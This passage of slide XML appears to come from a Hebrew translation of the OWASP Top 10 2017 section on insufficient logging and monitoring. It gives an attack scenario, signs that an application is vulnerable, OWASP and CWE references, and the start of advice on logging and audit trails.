                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>לאחר מספר ימים, הדבר עשוי לחזור תוך שימוש בסיסמא אחרת.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ארגון מסחרי אמריקאי גדול דיווח על ניתוח קוד עוין אשר בוצע ע"י מוצר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לניתוח קבצים מצורפים. המוצר ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> זיהה תוכנה חשודה, אך אף אחד לא הגיב להתראות. ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ייצר התראות במשך זמן מה לפני שהפריצה התגלתה בשל </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>פעולת מערכת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הנוגעת להונאת כרטיס אשראי אשר זוהתה ע"י הבנק.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תיעוד בלתי מספק, איתור, ניטור ותגובה קורים כל הזמן:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אירועים מתועדים, כגון אירועי הזדהות מוצלחים וכושלים, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ופעולות מערכת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בכמות גבוהה בלתי מתועדים</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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התראות והודעות שגיאה אשר אינם מייצרים תיעוד, מייצרים תיעוד בלתי מספק או הודעות בלתי ברורה.</a:t>
            </a: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קבצי תיעוד של יישומים או ממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) אינם מנוטרים אחר פעילות חריגה.</a:t>
            </a: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קבצי תיעוד נשמרים מקומית בלבד.</a:t>
            </a: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סף התראות מספק, אך נהלי תגובה אינם מיושמים או בלתי אפקטיביים.</a:t>
            </a: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בדיקות חוסן וסריקות ע"י כלי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) אינם מייצרים התראות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>היישום אינו מסוגל לזהות, למנף, או להתריע על מתקפות בזמן אמת או קרוב לזמן אמת.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אתה פגיע לזליגת מידע במידה ואתה מאפשר למשתמש או לתוקף גישה לקבצי התיעוד ולהתראות (ראה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Sensitive Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Implement Logging and Intrusion Detection</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V8 Logging and Monitoring</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Detailed Error Code</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Logging</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nSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="he-IL" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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11"/>
              </a:rPr>
              <a:t>CWE-223: Omission of Security-relevant Information</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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12"/>
              </a:rPr>
              <a:t>CWE-778: Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3159195"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בהתאם לרמת הסיכון למידע המאוחסן או מעובד ע"י היישום:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>וודא כי כלל אירועי ההזדהות וגישה למערכת (לרבות אירועים כושלים), ובדיקות קלט אחר כשלונות בצד השרת ניתנים לניטור באמצעות חשבון משתמש ייעודי אשר מאפשר לאתר פעילות חריגה או שימוש בחשבונות זדוניים, ובשימוש זמן מספק להשהיית ניתוח משפטי (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>forensics analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a: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וודא כי קבצי הניטור נוצרים בפורמט אשר ניתן לקריאה ע"י פתרונות אחסון קבצי ניטור מרכזי.</a:t>
            </a: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וודא כי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>פעולות מערכת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בכמות גבוהה מכילות תיעוד (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>audit trail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) בעל הגנה מפני שינוי (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
